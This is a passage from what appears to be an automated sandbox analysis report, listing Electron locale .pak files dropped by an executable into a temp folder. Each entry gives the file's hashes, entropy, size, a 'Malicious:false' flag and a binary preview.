                                                                                                                                                                      SHA-256:297E3647EAF9B3B95CF833D88239919E371E74CC345A2E48A5033EBE477CD54E
                                                                                                                                                                      SHA-512:1DC7D966D12E0104AACB300FD4E94A88587A347DB35AD2327A046EF833FB354FD9CBE31720B6476DB6C01CFCB90B4B98CE3CD995E816210B1438A13006624E8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.(...|.....}.@.....H.....M.....U.....].....e.....l.....s.....z.....{.....|...........................................................$....._.....x.....z.....~.....................................................7.....E.....R.....f.....v.....|...........................................................".....,.....2.....Q.....j.................................................................&.....3.....H.....N.....V...............................................!.....-.....>.....O.....R.....`.....r.............................................................................9.............................,.....?.....h.....w...........................................................5.....X............................................. .....".....%.....(.3...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.6...6.p...7.....8.....9.....;.....<.....=.....>.....?.#...@.B...A.z...C.....D.....E...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\fil.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):438088
                                                                                                                                                                      Entropy (8bit):5.195613019166525
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:2zHaVyEDQV5aZrU+5xeuhGjZ3ZmA58Pm+7JATvy8:2zNMdU4XA5Imb
                                                                                                                                                                      MD5:3165351C55E3408EAA7B661FA9DC8924
                                                                                                                                                                      SHA1:181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B
                                                                                                                                                                      SHA-256:2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
                                                                                                                                                                      SHA-512:3B1944EA3CFCBE98D4CE390EA3A8FF1F6730EB8054E282869308EFE91A9DDCD118290568C1FC83BD80E8951C4E70A451E984C27B400F2BDE8053EA25B9620655
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........].h.....i.....j.....k.....l.....n.....o.....p.&...r.,...s.=...t.F...v.[...w.h...y.n...z.}...|.....}...........................................................................................5.....<.....E.....d.....l.....y...................................................../.....E.....O.....^.....................................................".....8.......................................................................%.....J.....d.....~.................................................................+.....h.....q.....}...................................&.....4.....I.....o.....r................................................................. .....*.....5.....>.....O.................(.....0.................................................................,.....R.....l.............................6.....=.....H.....Y............... .....".....%.....(.....*.....+.....,.*.....B.../.W...0.`...1.....3.....4.....5.....6.....7.3...8.O...9.d...;.}...<.....=.....>.....?.....@.....A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\fr.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):454982
                                                                                                                                                                      Entropy (8bit):5.385096169417585
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:07bju28t6QuagV1ZztzYpZ4MYnYM/LDBW5Mx0q20wCbKZL3wfzkCh1f/5FEs6rYr:6JVzbf55Z
                                                                                                                                                                      MD5:0BF28AFF31E8887E27C4CD96D3069816
                                                                                                                                                                      SHA1:B5313CF6B5FBCE7E97E32727A3FAE58B0F2F5E97
                                                                                                                                                                      SHA-256:2E1D413442DEF9CAE2D93612E3FD04F3AFAF3DD61E4ED7F86400D320AF5500C2
                                                                                                                                                                      SHA-512:95172B3B1153B31FCEB4B53681635A881457723CD1000562463D2F24712267B209B3588C085B89C985476C82D9C27319CB6378619889379DA4FAE1595CB11992
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........>...h.....i.....j.....k.....l.....n.....o."...p./...r.5...s.F...t.O...v.d...w.q...y.w...z.....|.....}...........................................................................................1.....<.....E.....g.....s.....{.....................................................+.....<.....I.....W..............................................."...........j.......................................................................,.....M.....p.......................................................................T.....b.....l.........................................+.....:.....R.....U.....l...................................................................................[.......................$.....9.....N.................................................................X.........................................$.....E.....O... .[...".t...%.....(.....*.....+.....,.........../.#...0.1...1.n...3.....4.....5.....6.....7.....8.4...9.J...;.]...<.k...=.}...>.....?.....@.....A.....C.(...D.:.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\gu.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):879149
                                                                                                                                                                      Entropy (8bit):4.32399215971305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:Xz2UMY57hmdUoITsKMaWZKerbtsMhmksd4M+0+z20QmuOAl5VpvoxWnhygfZw/gQ:D2UMY57h9w4MSbsp5cLhdKE8
                                                                                                                                                                      MD5:7B5F52F72D3A93F76337D5CF3168EBD1
                                                                                                                                                                      SHA1:00D444B5A7F73F566E98ABADF867E6BB27433091
                                                                                                                                                                      SHA-256:798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
                                                                                                                                                                      SHA-512:10C6F4FAAB8CCB930228C1D9302472D0752BE19AF068EC5917249675B40F22AB24C3E29EC3264062826113B966C401046CFF70D91E7E05D8AADCC0B4E07FEC9B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........N...h.....i.....j.$...k.3...l.>...n.F...o.K...p.X...r.^...s.o...t.x...v.....w.....y.....z.....|.....}.............................................................................................................T.....l.................'.....).....5.....].......................4.....S.....i.............................l.................................................................'.....k.....t.....w.............................a.................;.....[.....n.....v.....}.......................+.....:.....f.......................X.....y...........].....s...................................6.....X.....w...............................................-.....L.....c....................... .....B.................Q.............................3.....?.....K.....}...................................o.............................3.....[... .a...".....%.....(.....*.g...+.j...,.........../.....0.....1.~...3.....4.....5.....6.[...7.....8.....9.....;.Q...<.h...=.....>.....?.....@.....A.D...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\he.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):544193
                                                                                                                                                                      Entropy (8bit):4.6265566170608325
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:DczykRrlOUmTU2/S9iyBZ60DAf1X2VeQCap4M52QoLpMzu5flmd9DnwWHQgZ:+F55VoQ
                                                                                                                                                                      MD5:6D787DC113ADFB6A539674AF7D6195DB
                                                                                                                                                                      SHA1:F966461049D54C61CDD1E48EF1EA0D3330177768
                                                                                                                                                                      SHA-256:A976FAD1CC4EB29709018C5FFCC310793A7CEB2E69C806454717CCAE9CBC4D21
                                                                                                                                                                      SHA-512:6748DAD2813FC544B50DDEA0481B5ACE3EB5055FB2D985CA357403D3B799618D051051B560C4151492928D6D40FCE9BB33B167217C020BDCC3ED4CAE58F6B676
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........)...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.%...v.:...w.G...y.M...z.\...|.b...}.t.....|.............................................................................2.....K.....^.....w.....................................................4.....O.....f.....y.............................%.....:....._.....r.....z...................................9.....A.....K.....g...............................................C.....m............................................... .....<.....d.....n...................................2.....}...................................!.....$.....7.....N.....a.....y................................................................._.........../.....9.............................".....:.....@.....L.....].....e.............................$....._............................................. .1...".L...%.}...(.....*.....+.....,.........../.....0.....1.W...3.l...4.....5.....6.....7.....8.1...9.E...;.Z...<.t...=.....>.....?.....@.....A.B...C.u.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\hi.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):921748
                                                                                                                                                                      Entropy (8bit):4.3093889077968495
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:zGFGsUtYgPLdROwJgdkFSvf4QAEm5dmGhsYK/GR3TX4/NMdpqdYnLsuFQdXPtg8y:zGEAgT/Zu5J57JtK
                                                                                                                                                                      MD5:1766A05BE4DC634B3321B5B8A142C671
                                                                                                                                                                      SHA1:B959BCADC3724AE28B5FE141F3B497F51D1E28CF
                                                                                                                                                                      SHA-256:0EEE8E751B5B0AF1E226106BEB09477634F9F80774FF30894C0F5A12B925AC35
                                                                                                                                                                      SHA-512:FAEC1D6166133674A56B5E38A68F9E235155CC910B5CCEB3985981B123CC29EDA4CD60B9313AB787EC0A8F73BF715299D9BF068E4D52B766A7AB8808BD146A39
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........"...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.,...w.9...y.?...z.N...|.T...}.f.....n.....s.....{.....................................................6.....X.....}.............................&.....@...................................%.....S.....y.......................&.............................Z.....j.....................................................2.....n.....w.....z.......................A.................).....o..............................................._.....n.................7.....T...............................................$.....n.....q............................./.....b.....i.....l.....n.........................................R...................................Z.....z...................................5.................q.................\...................................0... .K...".k...%.....(.....*.2...+.5...,.S........./.....0.....1.p...3.....4.....5.....6._...7.....8.....9.....;.^...<.r...=.....>.....?.....@.....A.;...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\hr.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):423481
                                                                                                                                                                      Entropy (8bit):5.516218200944141
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:yL0fCmEZW/FhjNmvgVRTKBOS+/6ocIG0uPXuyAF6WI6DkYAiKbeM/ogQbn7xjemW:QYCmNLjN3pV5v5tE77ORS
                                                                                                                                                                      MD5:8F9498D18D90477AD24EA01A97370B08
                                                                                                                                                                      SHA1:3868791B549FC7369AB90CD27684F129EBD628BE
                                                                                                                                                                      SHA-256:846943F77A425F3885689DCF12D62951C5B7646E68EADC533B8B5C2A1373F02E
                                                                                                                                                                      SHA-512:3C66A84592DEBE522F26C48B55C04198AD8A16C0DCFA05816825656C76C1C6CCCF5767B009F20ECB77D5A589EE44B0A0011EC197FEC720168A6C72C71EBF77FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........h...h.2...i.C...j.O...k.^...l.i...n.q...o.v...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................%.....,.....-...........0.....Y.....e.....q.................................................................A.....T.....p.....x...........................................................".....*.....8.....G.....X.............................................................................%.....B.....c.......................................................................G.....U.....a.....w.............................................../.....2.....B.....S.....f.....|.................................................................(.....g.............................8.....l.....{.....................................................I.....h................................................... .....".0...%.U...(.r...*.....+.....,.........../.....0.....1.....3.)...4.F...5.d...6.....7.....8.....9.....;.....<.....=.....>.4...?.=...@.N...A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\hu.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):456789
                                                                                                                                                                      Entropy (8bit):5.643595706627357
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:SGAK2lkJ2gSSSfLOAYkky1MV5QgsZfGRAxY62R9PSam7EEOEeLvx5gR4RStG2r2/:pAKWkJ2gSsAkV5QgsiR4747vx5VL/
                                                                                                                                                                      MD5:F5E1CA8A14C75C6F62D4BFF34E27DDB5
                                                                                                                                                                      SHA1:7ABA6BFF18BDC4C477DA603184D74F054805C78F
                                                                                                                                                                      SHA-256:C0043D9FA0B841DA00EC1672D60015804D882D4765A62B6483F2294C3C5B83E0
                                                                                                                                                                      SHA-512:1050F96F4F79F681B3EAF4012EC0E287C5067B75BA7A2CBE89D9B380C07698099B156A0EB2CBC5B8AA336D2DAA98E457B089935B534C4D6636987E7E7E32B169
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........6...h.....i.....j.....k.....l.....n.....o.....p.....r.#...s.4...t.=...v.R...w._...y.e...z.t...|.z...}.....................................................................................2.....G.....W.....q.....................................................9.....X.....d.....}...............................................0.....5.....;.....N.....^.....s.....................................................-.....G.....d.....z.......................#.....?.....H.....P.....W.....].....l...............................................(.....Q.....x...........................................................;.....`.....u.....|...............................................1.......................b.....w...........................................................K.....l.......................5.....L.....T....._.....w............... .....".....%.....(.....*.8...+.;...,.Y.....j.../.....0.....1.....3.....4.....5.....6.P...7.k...8.....9.....;.....<.....=.....>.....?.....@.....A.0...C.U...D.b.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\id.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):373937
                                                                                                                                                                      Entropy (8bit):5.37852966615304
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Fl9jv1p49ahfjDVnjHFsRmP28Wvr5PdhpvtEDSVsEaOq:FlLpblVnjHFCm+8Sr5Pdhzq
                                                                                                                                                                      MD5:7B39423028DA71B4E776429BB4F27122
                                                                                                                                                                      SHA1:CB052AB5F734D7A74A160594B25F8A71669C38F2
                                                                                                                                                                      SHA-256:3D95C5819F57A0AD06A118A07E0B5D821032EDCF622DF9B10A09DA9AA974885F
                                                                                                                                                                      SHA-512:E40679B01AB14B6C8DFDCE588F3B47BCAFF55DBB1539B343F611B3FCBD1D0E7D8C347A2B928215A629F97E5F68D19C51AF775EC27C6F906CAC131BEAE646CE1A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........@...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.................................................................................................5.....=.....T.....[.....e.......................................................................,.....J.....[.....h.............................................................................;.....?.....B.....G.....[.....j.....~.................................................................*.....F.....L.....a.........................................6.....H.....Q.....\.....r.........................................................................................!.....'.....3.....a.........................................C.....M.....Y.....`.....h.....o.....v.........................................>.....Q.....V.....\.....i............... .....".....%.....(.....*.....+.....,.#.....3.../.B...0.F...1.z...3.....4.....5.....6.....7.....8.....9.'...;.5...<.>...=.K...>.`...?.h...@.y...A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\it.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):414412
                                                                                                                                                                      Entropy (8bit):5.287149423624235
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:8cPuDjrpxctogSrqRrhsO11RT9TeexAGTL6+q2WKLV9fLwY+25OM388HrmwGWNBI:8cmDZREZJy8KL1LjAS5ZzoC
                                                                                                                                                                      MD5:D58A43068BF847C7CD6284742C2F7823
                                                                                                                                                                      SHA1:497389765143FAC48AF2BD7F9A309BFE65F59ED9
                                                                                                                                                                      SHA-256:265D8B1BC479AD64FA7A41424C446139205AF8029A2469D558813EDD10727F9C
                                                                                                                                                                      SHA-512:547A1581DDA28C5C1A0231C736070D8A7B53A085A0CE643A4A1510C63A2D4670FF2632E9823CD25AE2C7CDC87FA65883E0A193853890D4415B38056CB730AB54
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........S...h.....i.....j.%...k.4...l.?...n.G...o.L...p.Y...r._...s.p...t.y...v.....w.....y.....z.....|.....}.........................................................................1.....D.....S.....l.....w.................................................................?.....F.....V.....d.....p.....}...............................................!.....7.....k.............................................................................O.....t.......................................................................>.....L.....Y.....v...........................................................3.....H.....[.....s.................................................................*.....u.............................,.....R.....Z.....n.....w...............................................3.....N............................................. .....".....%.....(.(...*.D...+.G...,.e.....v.../.....0.....1.....3.....4.....5.....6.}...7.....8.....9.....;.....<.....=.....>.....?.....@./...A.]...C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ja.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):505292
                                                                                                                                                                      Entropy (8bit):5.701779406023226
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:rO2YZ2QUgbjicTver049pUVOT6z4Z72hA/Na4oQPkwaIAOenOIUNH7bbeCcX5RWX:rOpZ2eH/IzSVKo4Z728owPS58HRxVX
                                                                                                                                                                      MD5:D10D536BCD183030BA07FF5C61BF5E3A
                                                                                                                                                                      SHA1:44DD78DBA9F098AC61222EB9647D111AD1608960
                                                                                                                                                                      SHA-256:2A3D3ABC9F80BAD52BD6DA5769901E7B9E9F052B6A58A7CC95CE16C86A3AA85A
                                                                                                                                                                      SHA-512:C67AEDE9DED1100093253E350D6137AB8B2A852BD84B6C82BA1853F792E053CECD0EA0519319498AED5759BEDC66D75516A4F2F7A07696A0CEF24D5F34EF9DD2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........y.h.....i.....j.....k.....l.....m.....o.....p.....v.....w.....y.....z.....|.....}.0.....8.....=.....E.....P.....X.....g.....l.....t.....{...............................................$.....*.....<.....d.....y...................................).....S.....t...............................................'.....H.....c.....i.....x.............................5.....;.....M.....k...............................................E.....u.....................................................+.....R.....^.............................Q.....~...............................................#.....8.....d...........................................................V...........,.....2...................................5.....>.....J.....P.....Y.....t.............................8............................................. .....".....%.I...(.....*.....+.....,.........../.....0.#...1.h...3.....4.....5.....6.....7.4...8.R...9.p...;.....<.....=.....>.....?.....@.....A.E...C.l...D.....E.....F.....G...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\kn.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1012272
                                                                                                                                                                      Entropy (8bit):4.2289205973296395
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:VxaK34cS7yFcH4dr/4g7M5iVUZ+xw+UFV:jf7/K5uUb
                                                                                                                                                                      MD5:C548A5F1FB5753408E44F3F011588594
                                                                                                                                                                      SHA1:E064AB403972036DAD1B35ABE9794E95DBE4CC00
                                                                                                                                                                      SHA-256:890F50A57B862F482D367713201E1E559AC778FC3A36322D1DFBBEF2535DD9CB
                                                                                                                                                                      SHA-512:6975E4BB1A90E0906CF6266F79DA6CC4AE32F72A6141943BCFCF9B33F791E9751A9AAFDE9CA537F33F6BA8E4D697125FBC2EC4FFD3BC35851F406567DAE7E631
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....=.................=.....}......................./.....A.............................:.......................&.....d.................-.....U.................6.....N.....j.................L.............................4.....C.....F.....d.................4.................e.........................................P.....o...............................................J...........,.....H.....v.................(.....+.....e.......................G.....................................................(...........V...................................H.....`.....................................................c.................e.......................0.....k......... .....".....%._...(.....*.....+.....,.......4.../.l...0.....1.....3.7...4.....5.....6.U...7.....8.....9.....;.O...<.l...=.....>.....?.....@.....A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ko.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):425545
                                                                                                                                                                      Entropy (8bit):6.081959799252044
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:4Y3l9B6CI1zt8OhrJRFJCqM5T718I8Mtmq7hUoBAA:aZJo5D8GAA
                                                                                                                                                                      MD5:B4FBFF56E4974A7283D564C6FC0365BE
                                                                                                                                                                      SHA1:DE68BD097DEF66D63D5FF04046F3357B7B0E23AC
                                                                                                                                                                      SHA-256:8C9ACDE13EDCD40D5B6EB38AD179CC27AA3677252A9CD47990EBA38AD42833E5
                                                                                                                                                                      SHA-512:0698AA058561BB5A8FE565BB0BEC21548E246DBB9D38F6010E9B0AD9DE0F59BCE9E98841033AD3122A163DD321EE4B11ED191277CDCB8E0B455D725593A88AA5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.z...i.....j.....k.....l.....m.....o.....p.....r.....s.....t.....y.....z.....|.....}.......$.....).....1.....<.....D.....S.....X....._.....f.....h.....m...........................................................e.....u.....w.....{...............................................'.....F.....S.....f.....z...............................................$.....*.....3.....F.....Y....._.....b.....h.........................................8.....O.....U.....].....d.....m.....z................................... .....-.....W.....t.........................................,...../.....<.....L.....Y.....r.....................................................".......................s.................................................................=.....T...................................!.....'.....=.....O.....\... ._...".i...%.....(.....*.....+.....,.+.....A.../.^...0.j...1.....3.....4.....5.....6.=...7.S...8.j...9.z...;.....<.....=.....>.....?.....@.....A.....C.6...D.F...E.g...F.~...G...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\lt.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):457220
                                                                                                                                                                      Entropy (8bit):5.634955727013476
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Ca5OlSk7unX4nkokvgneIVUoCb1DD7U5R3zv9dFaL8tx9e2lJ2I96S2:Ca5Olrpgme2UoC9c59zv9fx9eoP6S2
                                                                                                                                                                      MD5:980C27FD74CC3560B296FE8E7C77D51F
                                                                                                                                                                      SHA1:F581EFA1B15261F654588E53E709A2692D8BB8A3
                                                                                                                                                                      SHA-256:41E0F3619CDA3B00ABBBF07B9CD64EC7E4785ED4C8A784C928E582C3B6B8B7DB
                                                                                                                                                                      SHA-512:51196F6F633667E849EF20532D57EC81C5F63BAB46555CEA8FAB2963A078ACDFA84843EDED85C3B30F49EF3CEB8BE9E4EF8237E214EF9ECFF6373A84D395B407
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........U...h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...r.c...s.t...t.}...v.....w.....y.....z.....|.....}.........................................................................8.....F.....S.....g.....r.....................................................5.....T.....m.....v...............................................!.....6.....=.....F.....S.....a.....u.....................................................&.....<.....Z.....w.............................5.....>.....F.....M.....X.....j.....................................................-.....T.....m.....{.................................................................H.....O.....R.....S.....].....h.....o.....y.................).....x.............................G.....X.....v...............................................B.....d...............................................)... .>...".N...%.m...(.....*.....+.....,.........../.!...0.$...1.U...3.f...4.....5.....6.....7. ...8.@...9.T...;.b...<.s...=.....>.....?.....@.....A.....C.:.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\lv.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):455871
                                                                                                                                                                      Entropy (8bit):5.635474464056208
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:GOQDGtu4e+D8NHtVFHTPq7K4vHo4q3sb3755ZanXDEG9Aarl4zxmEA5QXls14:GOQUZ2Gu4vTqw75KEGGmEs14
                                                                                                                                                                      MD5:E4F7D9E385CB525E762ECE1AA243E818
                                                                                                                                                                      SHA1:689D784379BAC189742B74CD8700C687FEEEDED1
                                                                                                                                                                      SHA-256:523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
                                                                                                                                                                      SHA-512:E4796134048CD12056D746F6B8F76D9EA743C61FEE5993167F607959F11FD3B496429C3E61ED5464551FD1931DE4878AB06F23A3788EE34BB56F53DB25BCB6DF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....O.....b.....u.....................................................!.....%.....M.....].....s.....z...............................................!.....2.....8.....>.....Q.....e.....{...........................................................%.....7.....I.....g.....}...........................................................3.....7.....P.........................................+.....<.....O.....d.....v...........................................................".....#.....-.....8.....@.....G.....Y.................-.....8...................................%.....,.....;.....>.....I....._.............................#.....T.....i.....p.....y..................... .....".....%.....(.....*.....+.1...,.O.....r.../.....0.....1.....3.....4.....5.!...6.\...7.|...8.....9.....<.....=.....>.....?.....@.....A.9...C.X...D.e.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ml.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1056673
                                                                                                                                                                      Entropy (8bit):4.264965642462621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:AYtrLnsoR47/R7nUwmoMmWDcZubSA/d+8di3ethK5d/7dxOt3ab:lt0oNwMi3eG5d/7Ot3c
                                                                                                                                                                      MD5:8B38C65FC30210C7AF9B6FA0424266F4
                                                                                                                                                                      SHA1:116413710FFCF94FBFA38CB97A47731E43A306F5
                                                                                                                                                                      SHA-256:E8DF9A74417C5839C531D7CCAB63884A80AFB731CC62CBBB3FD141779086AC7D
                                                                                                                                                                      SHA-512:0FD349C644AC1A2E7ED0247E40900D3A9957F5BEF1351B872710D02687C934A8E63D3A7585E91F7DF78054AEFF8F7ABD8C93A94FCD20C799779A64278BAB2097
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........j...h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................".....).....0.....1.....2.....7.................".....b.....}.......................N...........3.....5.....9.....a.......................M.....{.................@.....n...........!.....e.............................'.......................C.....}.............................H.................=.................P.....~.........................................v.................I.....j.........................................b...................................q.......................b.....i.....l.....n.............................1...........q.....'.....E...........N...........(.....`...................................;.............................Y.....4.............................;.....k... .....".....%.n...(.....*.....+.....,.M........./.....0.....1.}...3.....4.....5.>...6.....7.....8.....9.....;.....<.8...=.X...>.....?.....@.....A.....C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\mr.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):863911
                                                                                                                                                                      Entropy (8bit):4.295071040310227
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:OVDue+/Ti/eFcDX6WRAWXXspvidz0F5MU9G3GRe3RQR3K5/knxi4nou4bmHwIZus:eueAi2FZW2bo26lp70Kte5zGpGiBs
                                                                                                                                                                      MD5:C0EF1866167D926FB351E9F9BF13F067
                                                                                                                                                                      SHA1:6092D04EF3CE62BE44C29DA5D0D3A04985E2BC04
                                                                                                                                                                      SHA-256:88DF231CF2E506DB3453F90A797194662A5F85E23BBAC2ED3169D91A145D2091
                                                                                                                                                                      SHA-512:9E2B90F3AC1AE5744C22C2442FBCD86A8496AFC2C58F6CA060D6DBB08AF6F7411EF910A7C8CA5AEDEE99B5443D4DFF709C7935E8322CB32F8B071EE59CAEE733
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.#...t.,...v.A...w.N...y.T...z.c...|.i...}.{.......................................................................9.....[.....}...................................!...................................).....\.............................?.......................&.....E.....a.....w.......................[...............................................4.....^.......................L...................................&.....2.....U.....n.......................i.....................................................;.....X.........................................:.....m.....t.....w.....y.........................................7...................................-.....F.....f.....o.............................".....v.................O.............................?.....t......... .....".....%.,...(.b...*.....+.....,.........../.?...0.L...1.....3.....4.....5.P...6.....7.....8.:...9.b...;.....<.....=.....>.....?.....@.I...A.}...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ms.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):390303
                                                                                                                                                                      Entropy (8bit):5.258177538585681
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:zCsFFfyrvxoQuXkulRopY/5BI8T5sHAVHMM/k3y:tQxoNlR6K5v5vVsMZ
                                                                                                                                                                      MD5:9B3E2F3C49897228D51A324AB625EB45
